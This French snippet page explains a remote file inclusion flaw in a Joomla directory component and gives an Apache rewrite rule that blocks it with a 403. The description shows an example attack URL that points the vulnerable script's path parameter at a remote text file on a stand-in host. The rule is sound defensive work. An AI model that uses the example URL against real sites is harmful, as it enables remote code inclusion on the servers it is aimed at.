Bouts de Codes

Eviter la faille de sécurité de joomla (mosDirectory)

Information sur le code source

Enregistré le 31 Mai 2008 - Vu 6509 fois
Code source zippé: télécharger le zip
Impression: imprimer le code
  • Sociale bookmarking: Digg ce code sur digg.com
  • Bookmark ce code sur del.icio.us
  • Partage ce code sur Facebook
  • Bookmark ce code sur Google
  • Bookmark ce code sur Yahoo
  • Ajoute Eviter la faille de sécurité de joomla (mosDirectory)
Votre avis: 
 
Ecrit par :  admin
[66] sources en Apache voir
 

Description du code source

Informations sur le code source

Cette faille de sécurité par RFI (remote file include) existe dans le composant mosDirectory de joomla. La vulnérabilité concerne le script mod_pxt_latest.php. Les url concernées sont de la forme :
http://www.example.com/com_directory/modules/mod_pxt_latest.php?
GLOBALS[mosConfig_absolute_path]=http://www.sitepourri.com/page.txt??

Voir également :
» Page d'erreur 403 personnalisée

Code Source



.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
 

################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Eviter la faille de sécurité de joomla (mosDirectory)       #
#                                                                              #
# URL            : http://www.urlrewriting.fr/scripts43-Apache.htm             #
# Auteur         : admin                                                       #
# Date édition   : 31 Mai 2008                                                 #
#                                                                              #
################################################################################

RewriteCond %{QUERY_STRING} ^(.*&)?GLOBALS\[mosConfig_absolute_path\]=http://
RewriteRule ^(.*/)?com_directory/modules/mod_pxt_latest.php$ - [F,L]

Ajouter un commentaire

RSS
snippets


RSS
commentaires

 
Code de sécurité

Attention: Les champs marqués d'une étoile * sont obligatoires
Librairie

Langages de programmation

La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 références facilement accessibles. Visiter

  • Montez votre serveur de A à Z
  • Apache (version 2) : Installation, administration et sécurisation
  • Précis & Concis : Apache
  • Debian GNU/Linux - Services réseaux (Bind DNS, Apache, NFS, Samba, Messagerie...)
  • Serveurs LAMP : Administration de la plate-forme Web
  • LAMP (Linux, Apache, MySQL, PHP) - Coffret de 4 livres : Maîtrisez vos applications Web Open Source [Nouvelles versions]
  • Apache : La Référence
  • Apache
  • LAMP (Linux, Apache, MySQL, PHP) Pack 4 volumes : Maîtrisez vos applications Web en Open Source
  • Apache en action